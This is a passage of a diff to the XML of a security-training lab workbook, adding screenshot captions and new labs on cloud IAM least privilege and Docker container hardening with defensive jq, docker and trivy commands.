+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-12.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId21"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 12 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -3393,6 +5116,58 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="14" name="Picture 14"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-13.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId22"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 13 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -3418,7 +5193,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Segmentation · Firewalls · WAF · VPN · Encryption at rest · TLS · Backup</w:t>
+        <w:t>Cloud &amp; enterprise models · Segmentation · Firewalls · WAF · VPN · Containers · Data protection · Resilience</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3436,6 +5211,14 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
+        <w:t>Architecture models — on-premises, cloud, hybrid, virtualisation, containers, IoT/ICS — each shift the attack surface and the shared-responsibility line.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
         <w:t>Defence in depth layers controls; network segmentation and firewalls limit lateral movement and enforce least privilege between zones.</w:t>
       </w:r>
     </w:p>
@@ -3444,7 +5227,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>A web application firewall (WAF) filters HTTP attacks; a VPN protects data in transit across untrusted networks.</w:t>
+        <w:t>A web application firewall (WAF) filters HTTP attacks; a VPN protects data in transit; full-disk encryption (LUKS) and hardened TLS protect data at rest and in motion.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3452,15 +5235,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>Protect data at rest with full-disk encryption (LUKS) and data in transit with hardened TLS ciphers and protocols.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Resilience is a security property: a tested 3-2-1 backup and recovery plan defeats ransomware and hardware failure.</w:t>
+        <w:t>Resilience is a security property: RAID redundancy plus a tested 3-2-1 backup and recovery plan defeats ransomware and hardware failure.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3648,6 +5423,58 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="15" name="Picture 15"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-14.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId23"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 14 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -3848,6 +5675,58 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="16" name="Picture 16"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-15.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId24"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 15 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -4048,6 +5927,58 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="17" name="Picture 17"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-16.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId25"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 16 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -4230,6 +6161,58 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="18" name="Picture 18"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-17.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId26"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 17 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -4430,6 +6413,58 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="19" name="Picture 19"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-18.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId27"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 18 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -4594,6 +6629,58 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="20" name="Picture 20"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-19.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId28"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 19 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -4794,6 +6881,58 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="21" name="Picture 21"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-20.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId29"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 20 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -4811,15 +6950,20 @@
     <w:p/>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Domain 04 — Security Operations  (28%)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Hardening · IAM · MFA · SIEM · IDS · EDR · FIM · Vuln mgmt · IR · SOAR</w:t>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Lab 37 — Cloud Shared Responsibility &amp; IAM Least Privilege</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Exam objective: Apply least privilege and read a shared-responsibility model.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Goal: The learner models the cloud shared-responsibility split, then enforces least privilege on a mock cloud IAM policy and detects an over-permissive grant.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4829,57 +6973,12 @@
           <w:color w:val="1F6FEB"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>Key concepts</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Operational security hardens access (SSH, PAM, sudo, MFA) and monitors continuously (SIEM, IDS, EDR, file-integrity monitoring).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>A SIEM centralises and correlates logs; an IDS inspects network traffic; EDR and osquery interrogate endpoints.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Vulnerability management is a continuous pipeline: discover, prioritise (CVSS), remediate and verify.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Incident response follows preparation → detection → containment → eradication → recovery → lessons learned, increasingly automated with SOAR playbooks.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Lab 21 — SSH Hardening + Fail2ban</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Exam objective: Harden SSH to key-only auth and auto-ban brute-force IPs.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Goal: Switch SSH to key-based authentication and let Fail2ban ban repeated failed logins.</w:t>
+        <w:t>What you'll build</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>A responsibility matrix (IaaS/PaaS/SaaS) and a tightened least-privilege JSON policy with the wildcard removed.   (Tools: jq, policy JSON, bash.)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4889,12 +6988,97 @@
           <w:color w:val="1F6FEB"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>What you'll build</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Key-only SSH server with an active brute-force jail.   (Tools: openssh-server, fail2ban, ssh-keygen, iptables.)</w:t>
+        <w:t>Step-by-step</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Create an over-permissive policy granting *:* </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>echo '{"Effect":"Allow","Action":"*","Resource":"*"}' &gt; policy.json</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Flag the wildcard as a finding</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>jq 'select(.Action=="*")' policy.json &amp;&amp; echo "OVER-PERMISSIVE"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Rewrite it to least privilege (read one bucket)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>echo '{"Effect":"Allow","Action":["s3:GetObject"],"Resource":"arn:aws:s3:::reports/*"}' &gt; policy.json</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Confirm the wildcard is gone</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>jq -e '.Action|index("*")|not' policy.json &amp;&amp; echo LEAST-PRIV</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Map who secures what for IaaS/PaaS/SaaS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>printf "IaaS: you=OS,app,data\nPaaS: you=app,data\nSaaS: you=data,IAM\n"</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4904,6 +7088,122 @@
           <w:color w:val="1F6FEB"/>
           <w:sz w:val="22"/>
         </w:rPr>
+        <w:t>Test it</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The wildcard policy is flagged, and the rewritten policy scopes a single action to a single resource.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="22" name="Picture 22"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-37.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId30"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 37 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="1F6FEB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Note: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>Full step-by-step commands and references are in labs/lab-37-*.md. Reset the Killercoda playground before the next stateful lab.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Lab 38 — Container Security with Docker</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Exam objective: Run and harden a container securely.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Goal: The learner runs a container, inspects its isolation, drops capabilities, runs as non-root and scans the image for vulnerabilities.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="1F6FEB"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>What you'll build</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>A non-root, capability-dropped container and a Trivy image-scan report.   (Tools: docker, trivy.)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="1F6FEB"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
         <w:t>Step-by-step</w:t>
       </w:r>
     </w:p>
@@ -4912,7 +7212,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Install Fail2ban</w:t>
+        <w:t>Install Docker and run a container</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4922,7 +7222,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>apt update &amp;&amp; apt install -y fail2ban</w:t>
+        <w:t>apt install -y docker.io &amp;&amp; docker run -d --name web nginx</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4930,7 +7230,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Generate an ed25519 key pair</w:t>
+        <w:t>Inspect the default (root) user</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4940,7 +7240,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>ssh-keygen -t ed25519 -f ~/.ssh/lab_ed25519 -N "" -C "lab-key"</w:t>
+        <w:t>docker exec web whoami</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4948,7 +7248,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Authorize the public key</w:t>
+        <w:t>Re-run dropping all capabilities and as non-root</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4958,7 +7258,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>cat ~/.ssh/lab_ed25519.pub &gt;&gt; ~/.ssh/authorized_keys</w:t>
+        <w:t>docker run -d --name safe --user 1000 --cap-drop ALL --read-only nginx 2&gt;&amp;1 | tail -1</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4966,7 +7266,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Harden sshd (key-only, no root password)</w:t>
+        <w:t>Confirm the container cannot write the filesystem</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4976,7 +7276,15 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>cat &gt; /etc/ssh/sshd_config.d/99-hardening.conf &lt;&lt;'EOF'</w:t>
+        <w:t>docker exec safe touch /tmp/x 2&gt;&amp;1 || echo "READ-ONLY enforced"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Scan the image for known CVEs</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4986,7 +7294,15 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>PermitRootLogin prohibit-password</w:t>
+        <w:t>trivy image --severity HIGH,CRITICAL nginx | head -30</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Limit resources to blunt a DoS</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4996,7 +7312,141 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>PasswordAuthentication no</w:t>
